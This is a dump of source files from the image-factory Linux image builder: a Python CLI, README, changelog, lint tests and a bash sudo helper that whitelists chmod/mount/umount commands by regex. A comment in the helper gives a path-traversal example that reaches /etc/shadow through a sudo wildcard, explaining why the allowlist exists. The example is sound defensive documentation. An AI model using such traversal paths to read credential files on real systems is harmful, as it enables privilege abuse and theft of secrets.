config.get(destination, \"post-upload-command\" + str(i))\n command = [a for a in command.split(\" \") if a.strip() != \"\"]\n call_command(command)\n i += 1\n else:\n logger.error(\"Unknown upload type '%s' specified. 
Supported types: rsync\", upload_type)\n sys.exit(1)\n\n\ndef parse_args(argv):\n \"\"\"Parse the command line arguments.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"image\",\n nargs=\"?\",\n default=os.environ.get(\"IMAGE\"),\n help=\"Image to build (date and suffix will be added).\",\n )\n parser.add_argument(\n \"-c\", \"--cache-dir\", help=f\"Cache directory (default: {get_default_cache_dir()})\"\n )\n parser.add_argument(\n \"-f\", \"--format\", choices=[\"qcow2\", \"raw\"], help=\"Image format to use (default: raw)\"\n )\n parser.add_argument(\"--image-size\", help=\"Size of the raw image (default: 2G)\")\n parser.add_argument(\"--mac\", help=\"MAC address used in the installation machine\")\n parser.add_argument(\n \"--installer-logs\",\n dest=\"installer_logs\",\n action=\"store_true\",\n default=None,\n help=\"Print installer logs into logging output\",\n )\n parser.add_argument(\n \"--no-installer-logs\",\n dest=\"installer_logs\",\n action=\"store_false\",\n default=None,\n help=\"Do not print installer logs into logging output\",\n )\n parser.add_argument(\n \"--log-file\",\n dest=\"log_file\",\n action=\"store_true\",\n default=None,\n help=\"Store logs into a file (in addition to stdout/stderr)\",\n )\n parser.add_argument(\n \"--no-log-file\",\n dest=\"log_file\",\n action=\"store_false\",\n default=None,\n help=\"Do not store logs into a file (in addition to stdout/stderr)\",\n )\n parser.add_argument(\"--log-filename\", help=\"Log into the specified file\")\n args = parser.parse_args(argv)\n\n if not args.image:\n parser.error(\"No image specified.\")\n\n return args\n\n\ndef override_configs_by_args(config, args):\n \"\"\"Override the configs from the configuration file with arguments from the command line.\n\n The command line arguments take precedence over the configs from the config file.\n \"\"\"\n if args.image not in config:\n config[args.image] = {}\n image_conf = config[args.image]\n\n if args.cache_dir is not None:\n image_conf[\"cache_dir\"] = args.cache_dir\n if args.mac is not None:\n image_conf[\"mac\"] = args.mac\n if args.format is not None:\n image_conf[\"format\"] = args.format\n if args.image_size is not None:\n image_conf[\"image-size\"] = args.image_size\n if args.installer_logs is not None:\n image_conf[\"installer-logs\"] = str(args.installer_logs)\n if args.log_file is not None:\n image_conf[\"log-file\"] = str(args.log_file)\n if args.log_filename is not None:\n image_conf[\"log-filename\"] = args.log_filename\n\n if \"cache_dir\" not in image_conf:\n image_conf[\"cache_dir\"] = get_default_cache_dir()\n\n return config\n\n\ndef main():\n args = parse_args(sys.argv[1:])\n config = get_config()\n missing_image_section = args.image not in config\n override_configs_by_args(config, args)\n image_conf = config[args.image]\n image_conf[\"cache_dir\"] = os.path.expanduser(image_conf[\"cache_dir\"])\n\n logger = logging.getLogger(__logger_name__)\n logging.basicConfig(format=DEFAULT_LOGGING_FORMAT, level=logging.INFO)\n if image_conf.getboolean(\"log-file\", fallback=False):\n if \"log-filename\" in image_conf:\n log_filename = image_conf[\"log-filename\"]\n else:\n log_filename = args.image + \"-\" + datetime.date.today().isoformat() + \".log\"\n file_handler = logging.FileHandler(log_filename, mode=\"w\")\n file_handler.setFormatter(logging.Formatter(DEFAULT_LOGGING_FORMAT))\n logger.addHandler(file_handler)\n\n # Check that configuration for installer_image or (initrd and linux) exists\n if \"installer_image\" not in image_conf:\n 
required_options = [\"initrd\", \"linux\"]\n missing_options = [option for option in required_options if option not in image_conf]\n if missing_options:\n if missing_image_section:\n logger.error(\"No section '%s' defined in image-factory.conf.\", args.image)\n else:\n for option in missing_options:\n logger.error(\n \"No option '%s' or 'installer_image' defined in section '%s' \"\n \"in image-factory.conf.\",\n option,\n args.image,\n )\n sys.exit(1)\n\n image = args.image + \"-\" + datetime.date.today().isoformat() + \".raw\"\n create_raw_image(image, image_conf.get(\"image-size\", DEFAULT_IMAGE_SIZE))\n run_installation(config, args.image, image)\n post_installation(\n os.path.basename(sys.argv[0]),\n image,\n image_conf.getboolean(\"installer-logs\", fallback=False),\n )\n if image_conf[\"format\"] == \"qcow2\":\n image = create_qcow2(image, image_conf.getboolean(\"keep-raw\", fallback=False))\n else:\n create_hashsum(image)\n logger.info(\"Successfully created %s\", image)\n upload_image(config, args.image, image, image + \".sha256sum\")\n if config.has_option(args.image, \"post-build-command\"):\n cmd = [config.get(args.image, \"post-build-command\"), image]\n call_command(cmd)\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print(\"User abort.\")\n" }, { "alpha_fraction": 0.7509717345237732, "alphanum_fraction": 0.753044843673706, "avg_line_length": 29.626983642578125, "blob_id": "44e4cc0662014ff9faf2d608ef98a4f30d9b40dd", "content_id": "ab81b41c94ddf8eed4d2ba588953d9be81fbb65a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3859, "license_type": "permissive", "max_line_length": 79, "num_lines": 126, "path": "/README.md", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "image-factory\n=============\n\nimage-factory is a command line tool for building golden Linux images. It uses\nvirt-install to do installations via the network. The installation and\nconfiguration of the images is done using the netinstall support from the\ndistributions, i.e.\n\n* preseed for Debian/Ubuntu\n* Kickstart for CentOS/Fedora\n* AutoYaST for openSUSE\n\nimage-factory is used by IONOS Cloud to build the golden public Linux images\nfor their Enterprise Cloud. The configuration files are shipped with this\nproject to allow anyone to rebuild their images.\n\nimage-factory runs following steps:\n\n* Create a virtual RAW image using `qemu-img`.\n\n* Cache `linux` kernel and `initrd`.\n\n* Run installation using `virt-install`. 
`qemu:///session` is used as session\nfor normal users and `qemu:///system` when run as root.\n\n* The installation partition is mounted and the installer logs are removed.\n\n* `zerofree` is run on the partition.\n\n* If `format` is set to `qcow2`, the virtual raw images will be converted\nto `qcow2` using `qemu-img`.\n\n* The SHA 256 sum is calculated for the image.\n\n* The image will be uploaded to all locations configured in\n`upload_destinations`.\n\n* If `post-build-command` is configured, the specified command will be\nexecuted.\n\nDependencies\n============\n\nThese components are needed to run `image-factory`:\n\n* Python 3\n* Python modules:\n * httplib2\n * parted\n* qemu-utils for `qemu-img`\n* virtinst for `virt-install`\n* zerofree\n\npandoc is needed to generate the man page.\n\nThe test cases have additional requirements:\n\n* black\n* flake8\n* isort\n* pylint\n\nPermissions\n===========\n\n`image-factory` can be run as normal user, but it need root permission for a\nfew operations like chmod, mount, and umount. Since these operations cannot be\nsecured with sudo's wildcards, `image-factory-sudo-helper` was introduced to\ncheck the commands using regular expression.\n\nTo allow running `image-factory` as normal user, only\n`image-factory-sudo-helper` needs sudo permission for the user. Example sudo\nconfiguration for user `jenkins`:\n\n```\njenkins ALL = NOPASSWD:SETENV: /usr/bin/image-factory-sudo-helper\n```\n\nOn Debian and Ubuntu, the user has to be in the group `disk` to get the\npermission for mounting loop devices.\n\nAlternatives\n============\n\nHashiCorp Packer\n----------------\n\n[HashiCorp Packer](https://www.packer.io/) automates the creation of any type\nof machine image (including non *nix). The\n[QEMU Builder](https://www.packer.io/docs/builders/qemu) can provide a similar\nfunctionality to `image-factory`.\n\nWhile HashiCorp Packer takes an URL pointing to an installer ISO,\n`image-install` uses the smaller netinstall kernel and initrd files instead.\n\nHashiCorp Packer provides post-processors that can enable the remaining\nfunctionality of `image-factory`, namely\n[checksum](https://www.packer.io/docs/post-processors/checksum) and\n[local shell](https://www.packer.io/docs/post-processors/shell-local) to upload\nthe images via rsync, however there is currently no dedicated post-processor\nfor it. `image-factory` supports rsync uploads via configuration option.\n\nContributing\n============\n\nContributions are welcome. The source code has test coverage, which should be\npreserved or increased. So please provide a test case for each bugfix and one\nor more test cases for each new feature. 
Please follow\n[How to Write a Git Commit Message](https://chris.beams.io/posts/git-commit/)\nfor writing good commit messages.\n\nCreating releases\n=================\n\nTo create a release, increase the version in `Makefile`, document the\nnoteworthy changes in [NEWS.md](./NEWS.md), and commit and tag the release:\n\n```sh\ngit commit -s -m \"Release image-factory $(make version)\" Makefile NEWS.md\ngit tag \"$(make version)\" -m \"Release image-factory $(make version)\"\n```\n\nThe xz-compressed release tarball can be generated by running:\n```sh\nmake dist\n```\n" }, { "alpha_fraction": 0.6301490068435669, "alphanum_fraction": 0.6393514275550842, "avg_line_length": 39.75, "blob_id": "0be8cbf6330cbe6f19a4a55f72ad6fab2cddd580", "content_id": "dbf7bd3935074ed2a876e253426fccd5b2748849", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2282, "license_type": "permissive", "max_line_length": 91, "num_lines": 56, "path": "/tests/test_flake8.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2017-2018, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Run flake8 check.\"\"\"\n\nimport subprocess\nimport sys\nimport unittest\n\nfrom . import get_source_files, unittest_verbosity\n\n\nclass Flake8TestCase(unittest.TestCase):\n \"\"\"\n This unittest class provides a test that runs the flake8 code\n checker (which combines pycodestyle and pyflakes) on the Python\n source code. 
The list of source files is provided by the\n get_source_files() function.\n \"\"\"\n\n def test_flake8(self):\n \"\"\"Test: Run flake8 on Python source code.\"\"\"\n cmd = [sys.executable, \"-m\", \"flake8\", \"--max-line-length=99\"] + get_source_files()\n if unittest_verbosity() >= 2:\n sys.stderr.write(f\"Running following command:\\n{' '.join(cmd)}\\n\")\n with subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True\n ) as process:\n out, err = process.communicate()\n\n if process.returncode != 0: # pragma: no cover\n msgs = []\n if err:\n msgs.append(\n f\"flake8 exited with code {process.returncode} \"\n f\"and has unexpected output on stderr:\\n{err.decode().rstrip()}\"\n )\n if out:\n msgs.append(f\"flake8 found issues:\\n{out.decode().rstrip()}\")\n if not msgs:\n msgs.append(\n f\"flake8 exited with code {process.returncode} \"\n \"and has no output on stdout or stderr.\"\n )\n self.fail(\"\\n\".join(msgs))\n" }, { "alpha_fraction": 0.5848850011825562, "alphanum_fraction": 0.6495071053504944, "avg_line_length": 34.11538314819336, "blob_id": "acb2fe6a03a59ac7247b1f6e6c743baa1e5eac4e", "content_id": "e475cd31424b8c4ba50cad4dcf2e8a914dd19d94", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 913, "license_type": "permissive", "max_line_length": 75, "num_lines": 26, "path": "/NEWS.md", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "image-factory 1.0.2 (2021-11-12)\n================================\n\n* Fix issues found by pylint 2.11.1\n (fixes [Debian bug #998571](https://bugs.debian.org/998571)):\n * tests: Use `with` for `subprocess.Popen` and `open` calls\n * Open log files explicitly as UTF-8\n * Replace `.format()` with f-strings\n* Drop Python 2 support\n* Update my email address to @ionos.com\n* tests: Add black code formatting check\n* tests: Check import definitions order with isort\n* tests: Fix running tests as root\n* tests: Disable bad-continuation for pylint (for Ubuntu 20.04)\n* Use ftp.rz.uni-frankfurt.de as example CentOS mirror (old mirror is gone)\n\nimage-factory 1.0.1 (2021-01-29)\n================================\n\n* Update example CentOS 7 mirror URL (old URL does not work any more)\n* Increase CentOS 7 image size from 2 GiB to 3 GiB\n\nimage-factory 1.0.0 (2020-08-11)\n================================\n\n* Initial release\n" }, { "alpha_fraction": 0.670292317867279, "alphanum_fraction": 0.6811692714691162, "avg_line_length": 33.20930099487305, "blob_id": "19550e33cab79f26004002655576037257f3b7ef", "content_id": "76602733264fd10ba145cc91ecc45f635ee07f59", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1471, "license_type": "permissive", "max_line_length": 85, "num_lines": 43, "path": "/image-factory-sudo-helper", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "#!/bin/bash\nset -eu\n\n# Copyright (C) 2019, IONOS SE\n# Author: Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n# This sudo helper exists, because sudo does not support regular expressions\n# and the supported wildcards cannot be secured. Example:\n# `/tmp/image-factory/../../etc/shadow` matches `/tmp/image-factory*`\n\nMOUNTDIR=/tmp/image-factory\npassed=\n\nif [[ \"$*\" =~ ^chmod( -R)?\\ o[+-]r?w?x?\\ ${MOUNTDIR}\\.(\\.?[A-Za-z0-9_/-]+)*$ ]]; then\n\tpassed=yes\nelif [[ \"$*\" =~ ^mount\\ /dev/loop[0-9]*\\ ${MOUNTDIR}\\.[A-Za-z0-9_/-]*$ ]]; then\n\tpassed=yes\nelif [[ \"$*\" =~ ^umount\\ ${MOUNTDIR}\\.[A-Za-z0-9_/-]*$ ]]; then\n\tpassed=yes\nfi\n\nif test -z \"$passed\"; then\n\techo \"${0##*/}: Command '$*' not allowed.\" >&2\n\texit 1\nfi\n\nif test -n \"${DRYRUN:-}\"; then\n\techo \"${0##*/}: $*\"\nelse\n\texec \"$@\"\nfi\n" }, { "alpha_fraction": 0.5964125394821167, "alphanum_fraction": 0.6046912670135498, "avg_line_length": 38.17567443847656, "blob_id": "51bb1db5274354be8fad765b1460b52e16819b75", "content_id": "eb8ccabbf0061667f77fa132e80b91376dd2b12a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2899, "license_type": "permissive", "max_line_length": 95, "num_lines": 74, "path": "/tests/test_pylint.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2010, Stefano Rivera <[email protected]>\n# Copyright (C) 2017-2018, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH\n# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\n# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,\n# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\n# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR\n# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\n# PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Run pylint.\"\"\"\n\nimport os\nimport re\nimport subprocess\nimport sys\nimport unittest\n\nfrom . import get_source_files, unittest_verbosity\n\nCONFIG = os.path.join(os.path.dirname(__file__), \"pylint.conf\")\n\n\nclass PylintTestCase(unittest.TestCase):\n \"\"\"\n This unittest class provides a test that runs the pylint code check\n on the Python source code. The list of source files is provided by\n the get_source_files() function and pylint is purely configured via\n a config file.\n \"\"\"\n\n def test_pylint(self):\n \"\"\"Test: Run pylint on Python source code.\"\"\"\n\n cmd = [sys.executable, \"-m\", \"pylint\", \"--rcfile=\" + CONFIG, \"--\"] + get_source_files()\n if unittest_verbosity() >= 2:\n sys.stderr.write(f\"Running following command:\\n{' '.join(cmd)}\\n\")\n with subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True\n ) as process:\n out, err = process.communicate()\n\n if process.returncode != 0: # pragma: no cover\n # Strip trailing summary (introduced in pylint 1.7). 
This summary might look like:\n #\n # ------------------------------------\n # Your code has been rated at 10.00/10\n #\n out = re.sub(\n \"^(-+|Your code has been rated at .*)$\", \"\", out.decode(), flags=re.MULTILINE\n ).rstrip()\n\n # Strip logging of used config file (introduced in pylint 1.8)\n err = re.sub(\"^Using config file .*\\n\", \"\", err.decode()).rstrip()\n\n msgs = []\n if err:\n msgs.append(\n f\"pylint exited with code {process.returncode} \"\n f\"and has unexpected output on stderr:\\n{err}\"\n )\n if out:\n msgs.append(f\"pylint found issues:\\n{out}\")\n if not msgs:\n msgs.append(\n f\"pylint exited with code {process.returncode} \"\n \"and has no output on stdout or stderr.\"\n )\n self.fail(\"\\n\".join(msgs))\n" }, { "alpha_fraction": 0.6644605994224548, "alphanum_fraction": 0.6982131004333496, "avg_line_length": 34.97618865966797, "blob_id": "76fddcbe6baa9640eb4270a7118a71c06d1b20b8", "content_id": "3ae8709010e81b3e451290e6258e54f7e42011d7", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1511, "license_type": "permissive", "max_line_length": 74, "num_lines": 42, "path": "/tests/test_helper.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2019, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Test helper functions from image-factory.\"\"\"\n\nimport unittest\n\nfrom image_factory import parse_bytes\n\n\nclass TestParseBytes(unittest.TestCase):\n \"\"\"\n This unittest class tests parse_bytes().\n \"\"\"\n\n def test_parse_1_g(self):\n \"\"\"Test parse_bytes(\"1G\")\"\"\"\n self.assertEqual(parse_bytes(\"1G\"), 1073741824)\n\n def test_parse_2_tb(self):\n \"\"\"Test parse_bytes(\"2 TB\")\"\"\"\n self.assertEqual(parse_bytes(\"2 TB\"), 2000000000000)\n\n def test_parse_512_mib(self):\n \"\"\"Test parse_bytes(\"512 MiB\")\"\"\"\n self.assertEqual(parse_bytes(\"512 MiB\"), 536870912)\n\n def test_invalid(self):\n \"\"\"Test parse_bytes(\"invalid\")\"\"\"\n with self.assertRaises(ValueError):\n parse_bytes(\"invalid\")\n" } ]
15
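To make the unit handling documented in `parse_bytes` above concrete, here is a minimal, self-contained sketch of the same mapping (SI prefixes as powers of 1000, binary prefixes as powers of 1024, and the bare K/M/G shorthands kept as binary for backward compatibility). The function name `parse_size` and the asserted values are illustrative only, not part of the repository:

```python
import re

# Unit tables mirroring the behaviour described in parse_bytes' docstring.
SI = {"B": 1, "kB": 10**3, "MB": 10**6, "GB": 10**9, "TB": 10**12, "PB": 10**15, "EB": 10**18}
BINARY = {"KiB": 2**10, "MiB": 2**20, "GiB": 2**30, "TiB": 2**40, "PiB": 2**50, "EiB": 2**60}
LEGACY = {"K": 2**10, "M": 2**20, "G": 2**30, "T": 2**40, "P": 2**50, "E": 2**60}

def parse_size(data):
    # Same grammar as image-factory's parse_bytes: an integer plus an optional unit.
    match = re.match(r"^([0-9]+)\s*([kMGTPE]?B|[KMGTPE]iB|[KMGTPE])$", data.strip())
    if not match:
        raise ValueError(f"cannot parse '{data}'")
    value, unit = int(match.group(1)), match.group(2)
    factor = SI.get(unit) or BINARY.get(unit) or LEGACY[unit]
    return value * factor

assert parse_size("2 GB") == 2_000_000_000     # SI prefix: powers of 1000
assert parse_size("512 MiB") == 536_870_912    # binary prefix: powers of 1024
assert parse_size("1G") == parse_size("1GiB")  # bare G stays binary, for backward compatibility
```

This is also why `run_installation` can shift the parsed RAM value right by 20 bits to obtain MiB: the return value is always a plain integer number of bytes.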
Jarbas-Jr/projetct-youtube-recommendation
https://github.com/Jarbas-Jr/projetct-youtube-recommendation
a875ad5cfc0c8650ca927d8370acfc12fc178b07
a32d8aee71db39e2559bfebb980f4f5659caa013
16b3758ccbaa37c3dc3265d0a77da32e6d43ad9b
refs/heads/master
2022-11-04T17:20:23.031115
2020-06-22T02:23:10
2020-06-22T02:23:10
265,133,672
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7655772566795349, "alphanum_fraction": 0.7742769718170166, "avg_line_length": 91.47826385498047, "blob_id": "8dfb592a7a7648887873d3d4a2ed22c1fc75f46b", "content_id": "c75acc3fe3dd951bfb361927d7072647143deaf5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 4307, "license_type": "no_license", "max_line_length": 783, "num_lines": 46, "path": "/4. Colocando em produção/Dockerfile", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "# Esse dockerfile vai ser o arquivo de configurações, as instruções que vamos dar para o contêiner.\n# Esse FROM, é um ambiente pré-configurado.\n# COPY esta simplesmente copiando os arquivos que temos pra uma pasta app, e ai ele vai tratar essa pasta app como a pasta onde ele deve rodar os comandos, entao os arquivos python vao parar dentro dessa pasta app, dentro do contêiner, dentro desse ambiente pré-configurado com todas as bibliotecas que precisamos. \n\n# Agora o grande problema vai do WORKDIR pra baixo, pq podemos rodar alguns comandos que vai instala algumas bibliotecas que precisamos. Então roda um 'apt-get update' pra ele atualizar os pacotes no linux. E vai instalar alguns pacotes que a gente precisa pra rodar o lighBGM, se nao vai dar erro, e isso mario achou olhando o docker do proprio LGBM, olhou no repositório do próprio LGBM e copiou os comandos necessarios de lá(https://github.com/microsoft/LightGBM/blob/master/docker/dockerfile-python).\n\n# Depois vamos rodar 'pip install -r requirements.txt', pip é o gerenciador de pacotes do python. E quando passamos '-r' e um arquivo 'requitements' ele vai tentar instalar a lista de bibliotecas nesse arquivo(ABRIR O ARQUIVO AQUI NA PASTA) com suas respectivas versões. Deve-se colocar a versão pq ele pode instalar a versão mais nova e ai ele pode quebrar algum código nosso. Mas como encontramos a versão da biblioteca que estamos usando pra treinar o modelo e etc ? Devemos abrir o terminal e colocar (pip freeze | grep 'nome da bib') e ele nos da a versão, dai é só copiar e jogar no requirements.txt.\n\n# Em 'CMD python ./app.py' que está comentado, esse é comando que se quisermos rodar com o servidor do flask, podemos rodar esse arquivo, mas nao e recomendavel usar em produção. Entao aqui ja colocamos direto com um servidor mais robusto com um servidor recomendado com o próprio heroku. Mario descobriu esses comandos indo no github do heroku e na documentação e eles trazem esse exemplo, e mario abriu o dockerfile do exemplo que eles tem, o exemplo minimo de um contêiner docker que pode ser feito o deploy no heroku(https://github.com/heroku/alpinehelloworld/blob/master/Dockerfile). Mario foi ver quais o comandos, e eles estão usando 'G unicorn', servidor robusto pra se usar em produção. \n\n# LEMBRANDO: quando estivermos lidando com coisas em produção, bom perguntar pra quem entenda melhor parte de servidor, infraestrutura, devops, engenharia, pra ter certeza que estamos fazer do jeito seguro, que nao nos traga problemas depois e o foco aqui é na modelagem e não da engenharia. Então estamos fazendo uma solução basica pra colocar em produção e em boa parte do tempo nao vamos fazer uma aplicação que será exposta diretamente a um usuario na internet, pelo menos nao dessa maneira que tu ja entra e ja roda o flask ali. Geralmente vamos fazer API's internas que uma outra aplicação vai acabar fazendo a requisição, entao acaba sendo mais seguro. 
Mas definitivamente isso aqui acaba sendo mais de Engenharia de Machine Learning do que da ciencia de dados e da modelagem.\n\n# Segundo a documentação do heroku, precisamos passar aqui 'CMD gunicorn --bind 0.0.0.0:$PORT wsgi'. e o cifrão PORT e pra colocar a porta que ele vai rodar.\n\n# Se quisermos rodar localmente, descomentamos o comando '#CMD gunicorn --bind 0.0.0.0:80 wsgi ', e ai rodamos essa imagem do docker em um ambiente local(localhoost no linux). \n\nFROM python:3.7-slim\nCOPY . /app\nWORKDIR /app\nRUN apt-get update && \\\n apt-get install -y --no-install-recommends \\\n ca-certificates \\\n cmake \\\n build-essential \\\n gcc \\\n g++ \nRUN pip install -r requirements.txt\nRUN python db_starter.py\n#CMD python ./app.py\n\n# Run the image as a non-root user\n#RUN adduser -D myuser\n#USER myuser\n\n# Run the app. CMD is required to run on Heroku\n# $PORT is set by Heroku\t\t\t\nCMD gunicorn --bind 0.0.0.0:$PORT wsgi \n#CMD gunicorn --bind 0.0.0.0:80 wsgi \n\n\n#https://github.com/microsoft/LightGBM/blob/master/docker/dockerfile-python\n#https://github.com/heroku/alpinehelloworld\n#https://devcenter.heroku.com/articles/container-registry-and-runtime\n\n#Creating app... done, ⬢ sheltered-reef-65520\n#https://sheltered-reef-65520.herokuapp.com/ | https://git.heroku.com/sheltered-reef-65520.git" }, { "alpha_fraction": 0.7835497856140137, "alphanum_fraction": 0.7835497856140137, "avg_line_length": 76.33333587646484, "blob_id": "e9d99780a7cd75040895cd645fb86207aba1d811", "content_id": "c9717f48da58be6bde9c8ba8a2157db0c9b9bf35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 236, "license_type": "no_license", "max_line_length": 195, "num_lines": 3, "path": "/4. Colocando em produção/wsgi.py", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "from app import app as application\n\n# esse serve pra gente poder usar um servidor chamado 'G unicorn', que vai ser o servidor que vai atender as requisições que forem feitas pro nosso app. Então isso é tudo, é a parte mais simples." }, { "alpha_fraction": 0.635898768901825, "alphanum_fraction": 0.6366658210754395, "avg_line_length": 80.5, "blob_id": "858b4ddf428663579a4959237bf09c2d89cf67e7", "content_id": "7162478af87e44d02a62cf605721848779040bd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3948, "license_type": "no_license", "max_line_length": 318, "num_lines": 48, "path": "/4. Colocando em produção/run_backend.py", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "from get_data import *\nfrom ml_utils import *\nimport time\n\nqueries = [\"machine+learning\", \"data+science\", \"kaggle\"]\n\n# A gente ta puxando essa função la pro arquivo python do app.\n# Abre o arquivo novos videos, vai iterar pelas queries, que nem nos notebooks de coleta e processamento la no começo, entao e importante guardar para adapta-lo pra buscar as mesmas informações me produção.\n\ndef update_db():\n with open(\"novos_videos.json\", 'w+') as output:\n for query in queries: \n # aqui colocamos pra pegar até a pagina 3.\n for page in range(1,4):\n print(query, page)\n # a gente vai baixar a pagina de busca passando qual é a query e qual é a pagina. 
Retorna o codigo fonte e armazena esse search_page\n search_page = download_search_page(query, page)\n # mesma coisa pra pegar os links dos videos, so que ao invés de salvar em um dataframe que nem antes, a gente salva nesa video_list.\n video_list = parse_search_page(search_page)\n \n # e ai a gente vai iterar por cada video nessa video_list\n for video in video_list:\n # baixar as informações da pagina do video, passando pra essa função o link do video, passando o link ela vai acessar essa pagina e buscar as informações, vai guardar na video_page, equivalente a aquela função que usavamos para salvar HTMLS, a pagina de cada video\n video_page = download_video_page(video['link'])\n # vamos fazer o processamento dessa pagina de video, e vamos retornar algumas informações como o json.\n video_json_data = parse_video_page(video_page)\n \n # mario descobriu que alguns videos o endereço deles nao funcional, nao se acha as informações. Entao colocamos que se o 'watch-time-text' nao tiver no video_json_data, pula para o proximo video. Proteção pra nao travar.\n if 'watch-time-text' not in video_json_data:\n continue\n # esse video_json_data, atraves da função compute_prediction, essa função vai pegar esses dados, criar as features, vai rodar o modelo e retornar pra gente a probabilidade de ser um video bom ou ruim. não probabilidade no sentido rigoroso mas um score de relevância pra gente rankear esses videos. \n p = compute_prediction(video_json_data)\n\n # Essa basicamente é a parte que a gente fez com ML, daqui pra frente e so processamento desses dados pra jogar la pro fronted, a pagina onde tem a lista de videos.\n \n # aqui vou pegar uma 'tag', e vamos pegar o video_id que é o link do video.\n video_id = video_json_data.get('og:video:url', '')\n # e nesse data_front a gente passa as informações que a gente vai ter naquela lista de videos que criamos em app.py, quando rodamos o update.db, e das linhas criadas aqui individualmente. Com titulo, score e id do video.\n data_front = {\"title\": video_json_data['watch-title'], \"score\": float(p), \"video_id\": video_id}\n # momento em que a gente ta fazendo o processamento desse video no formato de nano segundos.\n data_front['update_time'] = time.time_ns()\n \n # aqui e um print so pra questao de debuguing, so pra ver se ele ta processando tudo bem, mas a gente poderia comentar essa linha que nao faria muita 